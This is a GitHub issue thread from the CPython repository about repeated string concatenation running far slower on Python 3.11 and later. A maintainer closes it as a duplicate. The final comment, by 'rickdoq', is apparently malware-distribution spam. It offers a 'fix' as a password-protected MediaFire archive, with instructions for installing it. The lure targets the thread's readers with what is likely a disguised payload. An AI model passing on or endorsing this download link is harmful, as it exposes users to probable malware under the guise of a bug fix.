### ISSUE TITLE
The exact same program runs more than 400 times slower in different versions of Python

### ISSUE THREAD

**Issue by 1005130** [python/cpython#123526] opened 2024-08-31 05:26 UTC
# Bug report

### Bug description:
```python
'''
On the same computer, the following simple program takes
about **0.7 seconds** to run on Python 3.10 or earlier,
but more than **300 seconds** to run on Python 3.11 or later 
'''
import time

STime = time.time() # the start time
a = ""
for i in range(1000000):
    a += "sxt"
ETime = time.time() # the end time
ATime = ETime-STime # the running time of the program
print(ATime)
```

### CPython versions tested on:

3.12

### Operating systems tested on:

Windows

**Comment by JelleZijlstra** [comment] 2024-08-31 05:29
Duplicate of #99862

**Closed as not planned by JelleZijlstra** 2024-08-31 05:29 UTC
Labels: type-bug

**Comment by rickdoq** [comment] 2024-08-31 05:33
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
